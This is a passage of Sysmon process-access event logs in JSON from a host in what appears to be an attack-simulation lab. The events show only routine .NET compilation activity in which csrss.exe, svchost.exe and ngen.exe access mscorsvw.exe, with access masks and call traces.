\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7718,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.278\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010AA2C0C00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.278","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010AA2C0C00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7719,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.278\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010AA2C0C00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.278","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010AA2C0C00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7720,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.325\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010E3300C00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.325","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010E3300C00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7721,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.325\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010E3300C00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.325","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010E3300C00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7722,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.325\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010E3300C00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.325","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010E3300C00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7723,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.372\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105C340C00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.372","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105C340C00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7724,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.372\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105C340C00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.372","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105C340C00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7725,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.372\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105C340C00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.372","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105C340C00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
